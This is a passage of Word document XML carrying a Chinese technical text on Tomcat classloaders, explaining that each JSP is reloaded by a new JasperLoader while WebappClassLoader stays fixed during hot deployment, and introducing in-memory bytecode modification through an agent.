          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面，我们可以看到后台输出，该</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JasperLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的一个实例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A70CB" w:rsidRPr="004A70CB" w:rsidRDefault="004A70CB" w:rsidP="002A5D38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，保存并刷新</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面，再次查看后台输出，此</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实例已经不是刚才那个了，也就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>再次装载了该</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A70CB" w:rsidRPr="004A70CB" w:rsidRDefault="004A70CB" w:rsidP="002A5D38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其实，对于每个</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都使用了一个独立的</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来装载，每次修改完</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都将使用一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来装载它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A70CB" w:rsidRPr="004A70CB" w:rsidRDefault="004A70CB" w:rsidP="002A5D38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关于如何使用自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来装载一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这里就不说了，相信网上都能找到，</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>属于一次性消费，每次调用容器将创建一个新的实例，属于用完就扔的那种，但是对于这种实现方式却很难用于其它情况下，如现在我们工程中很多都使用了单例，尤其是</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>工程，在这种情况下使用新的</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来加载修改后的类是不现实的，单例类将在内存中产生多个实例，而且这种方式无法改变当前内存中已有实例的行为，当然，</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也没通过该方式实现</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004A70CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件的重新加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B84D83" w:rsidRPr="00B84D83" w:rsidRDefault="0041176D" w:rsidP="00B84D83">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B84D83" w:rsidRPr="00B84D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过代理修改内存中</w:t>
      </w:r>
      <w:r w:rsidR="00B84D83" w:rsidRPr="00B84D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="00B84D83" w:rsidRPr="00B84D83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字节码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE740F" w:rsidRDefault="00BE740F" w:rsidP="00BE740F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>文件是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>org.apache.catalina.loader. WebappClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>装载的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>同样我们可以做个测试，测试过程与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>测试类似，测试步骤就不说了，只说一下结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0041176D" w:rsidRDefault="00BE740F" w:rsidP="00BE740F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>在热部署的情况下，对于被该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>classloader </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>加载的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>文件，它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>始终是同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WebappClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，除非容器重启了，相信做完这个</w:t>
      </w:r>
      <w:hyperlink r:id="rId252" w:tgtFrame="_self" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>实验</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
